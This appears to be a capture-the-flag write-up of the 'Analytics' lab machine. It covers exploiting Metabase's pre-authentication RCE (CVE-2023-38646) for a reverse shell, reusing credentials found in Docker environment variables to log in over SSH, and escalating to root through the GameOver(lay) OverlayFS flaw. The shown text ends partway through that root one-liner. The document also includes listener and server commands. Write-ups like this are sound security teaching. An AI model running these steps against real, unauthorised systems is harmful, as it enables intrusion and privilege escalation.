Synopsis Analytics is an easy difficulty Linux machine with exposed HTTP and SSH services. Enumeration of the website reveals a Metabase instance, which is vulnerable to Pre-Authentication Remote Code Execution ( CVE-2023-38646 ), which is leveraged to gain a foothold inside a Docker container. Enumerating the Docker container we see that the environment variables set contain credentials that can be used to SSH into the host. Post-exploitation enumeration reveals that the kernel version that is running on the host is vulnerable to GameOverlay , which is leveraged to obtain root privileges.
Nmap reveals two open ports. On port 22 SSH is running and on port 80 an Nginx web server. Since we do not have any credentials to log in via SSH, we will start by looking at port 80 .
HTTP Browsing to port 80 , we notice we are being redirected to analytical.htb . We add the domain to our /etc/hosts/ file to resolve it:
echo "10.129.229.224 analytical.htb" | sudo tee -a /etc/hosts
The web server is hosting a website of a research and data analysis company. We notice that there is a login section at the top of the page, which redirects us to data.analytical.htb . We need to add this subdomain, too, to /etc/hosts file in order to access the page.
echo "10.129.229.224 data.analytical.htb" | sudo tee -a /etc/hosts
We see that there is a Metabase instance running. Metabase is an open source tool that allows for powerful data instrumentation, visualization, and querying. It allows users to easily create and share interactive dashboards, perform ad-hoc queries, and analyze data from various sources.
Foothold Since we do not have credentials to access the Metabase instance we try looking at the version to see if we find any vulnerabilities.
curl http://data.analytical.htb/ | grep version
We see that the version running is v0.46.6 , which, according to this blog, is vulnerable to Pre- Authentication Remote Code Execution (CVE-2023-38646). This vulnerability occurs because users can access a special token called setup-token used for completing the setup process. The token remains active even after setup is done and can be accessed by unauthorized users. Exploiting this, one can send a custom POST request to the /api/setup/validate endpoint, potentially achieving code execution.
We can find the token by accessing the /api/session/properties endpoint and searching for setup-token .
Armed with the setup token, we can send a POST request to /api/setup/validate endpoint to achieve remote code execution. Note: Metasploit has since released a module to automate this exploit, but we will go through the motions manually. To use the Metasploit module, enter msfconsole and load it via use exploit/linux/http/metabase_setup_token_rce .
First, we save a reverse shell payload to a file, in order to host it on a local web server:
The above one-liner command will create a Bash script named rev.sh in our current working folder. This is what we will use to initiate the reverse shell connection to our Netcat listener, using the exploit.
As we have our Bash reverse shell script ready, let's start a Python web server on port 8081 , in the same directory where we saved the script.
python3 -m http.server 8081
We will use the below command to start a Netcat listener, which we will use to interact with our reverse shell connection once our script has been executed.
nc -lnvp 4444
Finally, we use the PoC from the aforementioned blog to construct a POST request, in order to retrieve our reverse shell from the local server and execute it. To accomplish this, we utilize the Repeater feature in Burp Suite .
Navigating BurpSuite is beyond the scope of this writeup, but those interested can refer to the Academy module Using Web Proxies.
Sending the request triggers a callback to our webserver, which subsequently sends a connection back to our Netcat listener. We have obtained a shell as the metabase user.
Lateral Movement It quickly becomes evident that we are inside a Docker container, as indicated by the hostname and the existence of a .dockerenv file in / .
Running the printenv command displays any environment variables that have been set.
printenv
Within the output, we find the credentials metalytics:An4lytics_ds20223# . We try using this combination to SSH into the machine.
ssh metalytics@analytical.htb Our attempt is successful, as we have authenticated as the metalytics user on the host. The user flag can be found at /home/metalytics/user.txt .
Privilege Escalation Enumerating the kernel version, we see that the target is using 6.2.0-25
uname -a
We also see that the box is on the jammy release.
lsb_release -a
A Google search reveals a vulnerability dubbed GameOver(lay) , in the OverlayFS module in
Ubuntu, which has been assigned both CVE-2023-2640 and CVE-2023-32629. Version 6.2.0 of Ubuntu 22.04 LTS (Jammy Jellyfish) , which we currently find ourselves on, is noted as one of the affected releases. On a high level, OverlayFS , a union filesystem, allows for the overlaying of one filesystem on top of another, facilitating modifications to files without changing the base filesystem. This feature is particularly useful in applications like Docker containers, where it's essential to keep the base image unchanged while modifications are applied in a separate layer. The flexibility of OverlayFS , however, introduces potential security risks. It enables scenarios where users can bypass certain filesystem restrictions (e.g., mount options like nodev or nosuid ) by masking filesystems.
Various Proof of Concept (PoC) scripts have since been published. We can use the following to one-liner to gain a shell as root :
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
